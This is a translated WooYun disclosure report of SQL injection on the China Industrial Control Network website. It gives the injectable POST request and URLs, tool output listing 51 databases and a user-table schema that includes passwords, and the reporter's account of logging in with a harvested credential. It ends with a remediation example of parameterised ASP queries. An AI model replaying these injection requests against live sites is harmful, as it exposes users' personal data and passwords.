
Vulnerability summary

Defect ID: wooyun-2016-0184767

Title: A site-wide vulnerability in China Industrial Control Network (中国工控网) can expose 3.35 million plaintext user records, passwords included

Affected vendor: China Industrial Control Network (中国工控网)

Author: 小菜果子

Submitted: 2016-03-15 13:40

Fixed: 2016-05-02 18:22

Published: 2016-05-02 18:22

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-03-15: Details sent to the vendor; awaiting the vendor's handling
2016-03-18: Vendor confirmed; details visible to the vendor only
2016-03-28: Details opened to core white hats and domain experts
2016-04-07: Details opened to regular white hats
2016-04-17: Details opened to intern white hats
2016-05-02: Details opened to the public

Brief description:

China Industrial Control Network is really hot right now. This time I took a different angle from the previous finders, but it feels the same. Asking for the front page, asking for 20 rank.

Details:

POST /customer/advantech/sq11.asp HTTP/1.1
Content-Length: 228
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDCCBADTDC=HCILKDPCFHHGOOAMFMDHCEDN
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
psw=1&select=%b0%e5%bf%a8%c0%e0OEM/ODM%b7%fe%ce%f1&tijiao=%cc%e1%bd%bb&usname=aaaa*&xq=1


http://**.**.**.**/customer/advantech/embed.asp?key=SOM


http://**.**.**.**/customer/advantech/download.asp?keyword=%E5%B7%A5%E6%8E%A7%E6%9C%BA


available databases [51]:
[*] ABB
[*] agongkong
[*] ase_050124
[*] caa
[*] cfpmia
[*] cus_2010_for_bb
[*] cus_abb
[*] cus_abb_BC
[*] custom
[*] custom_1
[*] forzdao
[*] GkCrm
[*] gkmall
[*] gknetdatanew
[*] gkoa
[*] gkreguser
[*] gkstat
[*] GkStudy
[*] gkstudynet
[*] gksystem
[*] gongkong
[*] gongkongcorp
[*] GongKongNet
[*] inquire
[*] kpi2012
[*] LouKong
[*] master
[*] model
[*] msdb
[*] NBBS
[*] NDic
[*] NMessage
[*] NReguser
[*] NRegUserDynamic
[*] NSys
[*] NSysLog
[*] nweblog
[*] opc_2009
[*] peCms
[*] Photography
[*] ReportServer
[*] ReportServerTempDB
[*] SchneiderBBS
[*] siemensEl
[*] siemensQuiz
[*] tempdb
[*] wap2011
[*] wapsubscribe
[*] xiugongkong
[*] xuegongkong
[*] youjiang




Database: gongkongnet
Table: RegUserView
[72 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| active | int |
| actUserId | char |
| address | nvarchar |
| answer | nvarchar |
| biddingType | char |
| classday | nvarchar |
| comCreatDate | datetime |
| Comment | varchar |
| companyName | nvarchar |
| companyUrl | nvarchar |
| customSettings | nvarchar |
| disableBizTrade | char |
| disableForum | char |
| distributeRate | decimal |
| email | nvarchar |
| emailAlertTime | datetime |
| fax | nvarchar |
| feedbacktrashnum | int |
| flag | char |
| handset | nvarchar |
| height | nvarchar |
| id | char |
| industryBound | nvarchar |
| industryCode | bigint |
| interest | nvarchar |
| interestCode | bigint |
| isAcceptSMS | int |
| IsAdded | int |
| isAddressValidation | int |
| isCardIdValidation | int |
| isemail | int |
| isEmailAlert | char |
| isExpert | int |
| isFaxValidation | int |
| isJoinMp | int |
| ismobile | int |
| isPhoneValidation | int |
| isTrueNameValidation | int |
| isUsefulAddress | char |
| isUsefulEMail | bit |
| isUsefulPhone | char |
| isUsefulUserInfo | char |
| job | nvarchar |
| jobdgree | nvarchar |
| joinFrom | nvarchar |
| joinMPTime | datetime |
| joinTime | datetime |
| lastLogin | datetime |
| lastTime | datetime |
| loginName | nvarchar |
| loginPoint | int |
| market | nvarchar |
| oldcode | int |
| organization | nvarchar |
| ownership | nvarchar |
| panman | nvarchar |
| password | nvarchar |
| persons | nvarchar |
| phone | nvarchar |
| postalcode | nvarchar |
| productTypeBound | nvarchar |
| province | nvarchar |
| question | nvarchar |
| sex | char |
| status | char |
| trueName | nvarchar |
| turnover | nvarchar |
| updateDate | datetime |
| userType | nvarchar |
| validLevel | int |
| vipRequest | char |
| workday | nvarchar |
+----------------------+----------+


mask area (contents redacted)


51个库.jpg (51 databases)


用户名密码.jpg (usernames and passwords)


I tried a username and password at random, and the login succeeded.

登录验证.jpg (login verification)

Proof of vulnerability:

51个库.jpg (51 databases)


用户名密码.jpg (usernames and passwords)


登录验证.jpg (login verification)

Fix recommendation:

Filter the parameters; deploy a WAF or a software firewall.
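What "filter the parameters" should mean on this stack: the injectable field is a form value posted to a classic ASP page (sq11.asp, field usname) backed by SQL Server, so the durable fix is a parameterised ADODB query rather than a filter or WAF alone. The handler below is an added example, not the site's code: it reconstructs a lookup against the RegUserView columns the dump lists (loginName, id); Application("ConnString"), the 50-character limit and the response text are assumptions.

```vbscript
<%
Option Explicit
' Added example (not the site's own handler). The report only shows the POST to
' sq11.asp with fields usname, psw, select and xq; the lookup below is a reconstruction
' using the RegUserView columns from the dump (loginName, id). The connection string in
' Application("ConnString") and the 50-character name limit are assumptions.

Const adCmdText = 1
Const adParamInput = 1
Const adVarWChar = 202

' Vulnerable shape implied by the report: the form value is spliced into the SQL text,
' so a quote inside usname changes the statement itself. Never build the query this way:
'   sql = "SELECT id FROM RegUserView WHERE loginName = '" & usname & "'"

Function LookupUser(usname)
    ' Returns the user id for an exact loginName match, or Empty when there is none.
    Dim conn, cmd, rs
    Set conn = Server.CreateObject("ADODB.Connection")
    conn.Open Application("ConnString")

    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    ' The placeholder is bound as a typed nvarchar value and sent separately from the
    ' statement, so a value such as "aaaa*" is matched literally as a login name.
    cmd.CommandText = "SELECT TOP 1 id FROM RegUserView WHERE loginName = ?"
    cmd.Parameters.Append cmd.CreateParameter("loginName", adVarWChar, adParamInput, 50, usname)

    Set rs = cmd.Execute
    If Not rs.EOF Then
        LookupUser = rs("id")
    Else
        LookupUser = Empty
    End If
    rs.Close
    conn.Close
End Function

' Server-side input check: reject names outside the expected shape before they reach
' the database. This is the "filter the parameter" part of the fix and complements,
' rather than replaces, a WAF in front of the site.
Dim usname, psw, userId
usname = Trim(Request.Form("usname"))
psw = Request.Form("psw")
If Len(usname) = 0 Or Len(usname) > 50 Then
    Response.Status = "400 Bad Request"
    Response.End
End If

userId = LookupUser(usname)
If IsEmpty(userId) Then
    Response.Write "Login failed"
Else
    ' The report shows passwords stored in plaintext. The stored value should be a
    ' salted hash, and psw verified against it here in code, never compared inside
    ' the SQL text.
    Response.Write "Found user " & Server.HTMLEncode(userId)
End If
%>
```

The same CreateParameter binding applies to the keyword and key query-string parameters on download.asp and embed.asp; a parameter bound this way cannot alter the statement regardless of what the WAF lets through.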

Copyright notice: please credit the source when reposting: 小菜果子@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2016-03-18 18:22

Vendor reply:

CNVD did not directly reproduce the described issue. CNVD has notified the site operator by email through its public contact channel, and the operator will provide a remediation plan.

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2016-03-22 10:03 | 酱油哥 ( Intern white hat | Rank:53 Vulnerabilities:3 | Just passing by.)

    It was already dumped back in 2010~